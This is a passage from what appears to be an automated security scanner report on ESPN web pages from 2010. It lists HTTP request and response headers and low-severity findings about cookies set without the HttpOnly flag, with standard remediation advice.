<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... </style> <script language="Javascript" src="http://a.espncdn.com/insertfiles/javascript/frame07.js" type="text/javascript"></script> <script language="Javascript" src="http://a.espncdn.com/insertfiles/javascript/motion.js" type="text/javascript"></script> ...[SNIP]... </script> <script src="http://a.espncdn.com/combiner/c/201008121630?js=jquery-1.4.2.1.js,plugins/json2.r3.js,plugins/teacrypt.js,plugins/jquery.metadata.js,plugins/jquery.bgiframe.js,plugins/jquery.easing.1.3.js,plugins/jquery.hoverIntent.js,plugins/jquery.jcarousel.js,plugins/jquery.tinysort.r3.js,plugins/jquery.pubsub.r5.js,ui/1.8.2/jquery.ui.core.js,ui/1.8.2/jquery.ui.widget.js,ui/1.8.2/jquery.ui.tabs.js,ui/1.8.2/jquery.ui.accordion.js,plugins/ba-debug-0.4.js,espn.l10n.r8.js,swfobject/2.2/swfobject.js,flashObjWrapper.r7.js,espn.core.duo.r46.js,stub.search.r3.js,espn.nav.mega.r22.js,espn.storage.r6.js,espn.p13n.r9.js,espn.video.r32.js,registration/staticLogin.r10-14.js,registration/espn.overlay.stub.r3-9.js,espn.insider.r5.js,espn.espn360.stub.r9.js,espn.myHeadlines.stub.r12.js,espn.myfaves.stub.r3.js,tsscoreboard.20090612.js,%2Fforesee_v3%2Fforesee-alive.js,espn.gallery.0908a.js"></script> ...[SNIP]... <!-- BEGIN STANDARD TAG - 728 x 90 - AR-PUBLISHER:31:espn:1228263135646150: AR-CHANNEL:180:Run of Site:1228263136676785 - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90§ion=481057"></SCRIPT> ...[SNIP]... </script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script> ...[SNIP]... <!-- BEGIN STANDARD TAG - 160 x 600 - AR-PUBLISHER:31:espn:1228263135646150: AR-CHANNEL:180:Run of Site:1228263136676785 - DO NOT MODIFY --> <SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=160x600§ion=481057"></SCRIPT> ...[SNIP]... </script><script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script> ...[SNIP]... <!--begin revenueScience-->
GET /horse-racing/breederscup2010/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:17:27 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Set-Cookie: SWID=4F518DDD-89D5-4083-B683-C54C5CEF326B; path=/; expires=Sat, 13-Nov-2030 18:17:27 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:50:50 GMT Content-Length: 69266 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:27 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:17:28 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 17:12:49 GMT Content-Type: text/html Last-Modified: Sat, 13 Nov 2010 17:12:03 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 13 Nov 2010 17:13:04 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 122659
GET /nba/gamecast HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:55:33 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN21 Set-Cookie: SWID=CE391CE2-1247-4E75-9651-8E3774C2B870; path=/; expires=Sat, 13-Nov-2030 17:55:32 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:56:32 GMT Content-Length: 10388 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:55:33 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /nba/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:15 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=AEF4146B-D529-448B-8614-6DB92B9DB4DC; path=/; expires=Sat, 13-Nov-2030 17:44:15 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:44:43 GMT Content-Length: 71849 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:15 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /nba/truehoop/miamiheat/ HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:32 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Set-Cookie: SWID=A36C7A92-BD02-4CA4-9B32-CCDC3852BDE9; path=/; expires=Sat, 13-Nov-2030 17:44:32 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:40:51 GMT Content-Length: 192983 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 17:44:32 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /nfl/mnf HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:58:51 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Set-Cookie: SWID=AFD7983B-8389-49D6-AD14-097781E023FF; path=/; expires=Sat, 13-Nov-2030 17:58:51 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:36:41 GMT Content-Length: 83888 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:58:52 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:12:54 GMT Content-Type: text/html Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Cache-Expires: Sat, 13 Nov 2010 17:12:56 GMT Cache-Control: no-cache Pragma: no-cache X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 98400
GET /poker/ HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:38 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=6C30C50F-3FA5-4E1B-8CEC-85BEDA536361; path=/; expires=Sat, 13-Nov-2030 18:16:38 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:22:36 GMT Content-Length: 65769 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com Set-Cookie: DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; expires=Tue, 23 Nov 2010 18:16:38 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /racing/schedule/_/series/sprint HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:08:36 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Set-Cookie: SWID=0F2EFF68-57CE-423C-8D40-61462BFBCFE6; path=/; expires=Sat, 13-Nov-2030 18:08:35 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:16:55 GMT Content-Length: 61978 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:08:36 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /sports/scores/window HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 17:44:05 GMT Content-Type: text/html; charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=C3047163-669F-485D-A1B6-1C4C4263C3AF; path=/; expires=Sat, 13-Nov-2030 17:44:05 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:44:20 GMT Content-Length: 8624 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 17:44:05 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
GET /sportsnation/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:17:18 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN14 Set-Cookie: SWID=A665627E-B567-429A-B422-47DA6BE6E1AC; path=/; expires=Sat, 13-Nov-2030 18:17:18 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:17:24 GMT Content-Length: 165044 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:17:18 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
GET /sportsnation/polls HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:52 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Set-Cookie: SWID=167E8A12-B4DB-4390-9328-BB7FCF0ECCE2; path=/; expires=Sat, 13-Nov-2030 18:16:52 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:22:33 GMT Content-Length: 36126 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:52 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /action/surfing/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 13 Nov 2010 18:16:18 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 18:16:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=B9DBE756-AA84-49F9-8B28-E4094FD4AD9F; path=/; expires=Sat, 13-Nov-2030 18:16:18 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:24:38 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:11 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /blog/ncfnation/tag HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:16:11 GMT Content-Type: text/html;charset=iso-8859-1 Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Set-Cookie: SWID=427C176E-6EA6-42A3-8194-2FBA103D60E1; path=/; expires=Sat, 13-Nov-2030 18:16:11 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:21:11 GMT InvH: blog-ncfnation Content-Length: 145036 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:16:11 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /college-football/boxscore HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:07:06 GMT Location: /ncf/index Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Set-Cookie: SWID=E92872C4-BE12-4B2E-BB7D-0AA36023222C; path=/; expires=Sat, 13-Nov-2030 18:07:06 GMT; domain=.go.com; Content-Length: 137 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/ncf/index ">/ncf/index </A>.<BODY></HTML>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /college-football/player/profile HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sat, 13 Nov 2010 18:06:05 GMT Location: /ncf/players Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Set-Cookie: SWID=BF82B54E-3F4A-4244-B738-35CCD6477567; path=/; expires=Sat, 13-Nov-2030 18:06:05 GMT; domain=.go.com; Content-Length: 141 Connection: close X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="/ncf/players ">/ncf/players </A>.<BODY></HTML>
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:07:58 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /college-football/schedule HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:07:58 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Set-Cookie: SWID=EB51C60F-0E86-4F96-8B62-80B778BC8886; path=/; expires=Sat, 13-Nov-2030 18:07:58 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:15:49 GMT Content-Length: 83996 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:07:58 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:14:31 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /espn/e60/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 13 Nov 2010 18:14:31 GMT Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Set-Cookie: SWID=8328CA99-7E19-45D9-B24B-026EDA221BDD; path=/; expires=Sat, 13-Nov-2030 18:14:31 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 17:13:37 GMT Content-Length: 51354 Cache-Control: no-cache Pragma: no-cache Set-Cookie: DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:14:31 GMT; Path=/; Domain=.go.com Connection: close X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn/feature/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 504 Gateway Timeout Date: Sat, 13 Nov 2010 18:14:16 GMT Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN20 Set-Cookie: SWID=B0852467-1E4A-49A8-8A32-E9097717B47A; path=/; expires=Sat, 13-Nov-2030 18:14:16 GMT; domain=.go.com; Content-Length: 794 Connection: close X-UA-Compatible: IE=EmulateIE7
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>ESPN - Not Fou ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn/fp/pollDataGenUniversal HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:13:59 GMT Content-Type: text/html; charset=utf-8 Last-Modified: Sat, 13 Nov 2010 18:13:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN13 Set-Cookie: SWID=91C3173E-DDD1-428F-BB2F-46CF326DCCC3; path=/; expires=Sat, 13-Nov-2030 18:13:59 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:16:14 GMT Content-Length: 184 Connection: close X-UA-Compatible: IE=EmulateIE7
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /espn/news/story HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: max-age=15 Date: Sat, 13 Nov 2010 18:11:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 13 Nov 2010 18:11:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN05 Set-Cookie: SWID=0DBA0074-F9E1-4BE9-89D9-4EE91CB4BAF7; path=/; expires=Sat, 13-Nov-2030 18:11:26 GMT; domain=.go.com; Cache-Expires: Sat, 13 Nov 2010 18:13:41 GMT Content-Length: 17 Connection: close X-UA-Compatible: IE=EmulateIE7
DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; expires=Tue, 23 Nov 2010 18:10:17 GMT; Path=/; Domain=.go.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /espn/page2/index HTTP/1.1 Host: espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
